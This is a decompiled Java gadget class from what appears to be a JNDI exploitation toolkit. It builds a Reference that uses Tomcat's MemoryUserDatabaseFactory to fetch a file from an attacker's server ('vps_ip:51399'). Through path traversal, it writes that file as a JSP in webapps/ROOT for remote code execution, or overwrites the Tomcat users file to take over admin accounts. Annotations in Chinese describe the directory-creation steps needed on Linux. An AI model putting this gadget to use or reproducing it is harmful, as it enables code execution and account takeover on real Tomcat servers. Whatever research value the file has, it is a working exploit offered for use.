package com.ar3h.chains.gadget.impl.jndi.factory;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import javax.naming.Reference;
import javax.naming.StringRefAddr;

@GadgetAnnotation(name = "Tomcat MemoryUserDatabaseFactory 写文件RCE", description = "factory: org.apache.catalina.users.MemoryUserDatabaseFactory\nclassName: org.apache.catalina.UserDatabase\n\n写文件RCE，Windows无需创建文件夹可直接触发该Gadget; Linux下需要配合其他姿势创建两个文件夹才可以写入\n可通过 H2CreateDirRef 或者 VelocityCreateDirRef 进行创建文件夹:\nstep1, create dir: http:\nstep2, create dir: http:/127.0.0.1:51399\n\n实际创建好的两层目录 http:/127.0.0.1:51399\n", dependencies = {"tomcat", "tomcat-juli", "tomcat-util", "tomcat-util-scan"})
@GadgetTags(tags = {Tag.Reference, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/MemoryUserDatabaseFactoryWriteFile.class */
public class MemoryUserDatabaseFactoryWriteFile implements Gadget {

    @Param(name = "http url", description = "下面例子会从远程访问url并下载文件到 webapps/ROOT/poc.jsp 目录\neg1: http://vps_ip:51399/../../webapps/ROOT/poc.jsp\n\n覆盖后台账号密码\neg2: http://vps_ip:51399/../../conf/tomcat.users.xml")
    public String url = "http://vps_ip:51399/../../webapps/ROOT/poc.jsp";

    Object getObject() {
        Reference reference = new Reference("org.apache.catalina.UserDatabase", "org.apache.catalina.users.MemoryUserDatabaseFactory", (String) null);
        reference.add(new StringRefAddr("readonly", "false"));
        reference.add(new StringRefAddr("pathname", this.url));
        return reference;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
